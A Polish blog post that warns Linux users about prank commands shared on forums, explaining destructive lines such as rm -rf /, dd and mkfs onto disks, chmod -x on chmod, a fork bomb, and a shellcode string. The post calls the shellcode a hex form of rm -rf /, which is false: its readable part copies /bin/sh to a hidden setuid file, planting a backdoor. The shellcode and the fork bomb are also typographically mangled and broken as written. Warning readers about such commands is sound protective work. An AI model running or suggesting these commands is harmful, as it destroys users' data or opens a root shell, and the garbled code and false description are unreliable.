Jak nie popełnić samobójstwa w Linuksie…

Szukając pomocy po forach internetowych, kanałach IRC i blogach musimy ubezpieczyć się w ostrożność, gdyż przez niezrównoważone poczucie humoru niektórych użytkowników Linuksa możemy doprowadzić do autodestrukcji systemu.

rm -rf /

Chyba najbardziej rozpowszechniony sposób na pozbycie się zawartości dysku. Kasuje wszystkie pliki w katalogu / i podrzędnych(parametr ‚r’), nie mówiąc nic przy tym(parametr ‚f’). Trzeba też uważać na inną formę tego polecenia, np:

rm -rf /var/lock/../../

– niby sugeruje, że kasujemy coś w folderze /var/lock, jednak dwie kropki w Linuksie oznaczają skoczenie do katalogu nadrzędnego, wiec w konsekwencji kasujemy /.

dd if=/dev/urandom of=/dev/sda1

Inny sposób na zniszczenie danych na dysku. Po prostu zapisuje czyste dane na dysk, bit po bicie z pliku źródłowego, uszkadzając bezpowrotnie partycje.

chmod -x /usr/bin/chmod

Komenda chmod zmienia uprawnienia plików, a parametr ‚-x’ odbiera uprawnienie do wykonania pliku jako programu. Po wykonaniu tej komendy nie będziemy w stanie zmienić uprawnienia żadnego pliku, gdyż program wykonujący to nie będzie maił uprawnień do wykonania się.

mkfs.ext3

Po prostu utworzy pustą partycję na miejscu istniejącej, przez co zniszczy dane.

byle_jaka_komenda > /dev/sda

Podobnie jak w wypadku dd czyste dane do urządzenia blokowego, tym razem będzie to wyjście z byle jakiego programu.

:(){:|:}:;

Komenda uruchomi proces, który uruchomi dwa następne, z kolei te utworzą cztery, następnie uruchomi się osiem procesów, itd., aż do zapchania RAMu i procesora. Jedyny sposób na zabezpieczenie się przed forkbombą to ograniczenie ilości procesów dla użytkownika.

char esp [] __attribute__ ((section ( „. tekst”))) / * release ESP * / = „\ xeb \ x3e \ x5b \ x31 \ xc0 \ x50 \ x54 \ x5a \ X83 \ xec \ x64 \ x68” \ xff \ xff \ xff \ xff \ x68 \ xDF \ xd0 \ xDF \ xd9 \ x68 \ x8d \ x99 „” \ XDF \ x81 \ x68 \ x8d \ x92 \ xDF \ xd2 \ x54 \ x5e \ xf7 \ x16 \ xf7 „” \ x56 \ X04 \ xf7 \ x56 \ x08 \ xf7 \ x56 \ x0c \ X83 \ xc4 \ x74 \ x56 „” \ x8d \ x73 \ x08 \ x56 \ x53 \ x54 \ x59 \ xb0 \ x0b \ xcd \ x80 \ x31 „” \ xc0 \ x40 \ xeb \ xf9 \ xe8 \ xbd \ xff \ xff \ xff \ x2f \ x62 \ x69 „” \ x6e \ x2f \ x73 \ x68 \ x00 \ x2d \ x63 \ x00 „cp — p / bin / sh / tmp / .beyond; chmod 4755 / tmp / .beyond „;

To samo co rm -rf / tylko, że szesnastkowo.

Ważne jest również,

aby nie uruchamiać skryptów i programów niewiadomego pochodzenia, gdyż nie wiadomo co w nich siedzi. Polecam używać programów z oficjalnych repozytoriów bądź kompilowanych samemu z oficjalnych źródeł – unikniemy nieprzyjemnych niespodzianek. Paczki w repozytoriach są znaczone kluczem GPG i jeżeli jakaś nie będzie miała prawidłowego, menedżer pakietów nas o tym powiadomi.

Jeżeli ktoś ma jeszcze jakieś pomysły, chętnie przeczytam je w komentarzach.

0
Zamknij

Choć staramy się je ograniczać, wykorzystujemy mechanizmy takie jak ciasteczka, które pozwalają naszym partnerom na śledzenie Twojego zachowania w sieci. Dowiedz się więcej.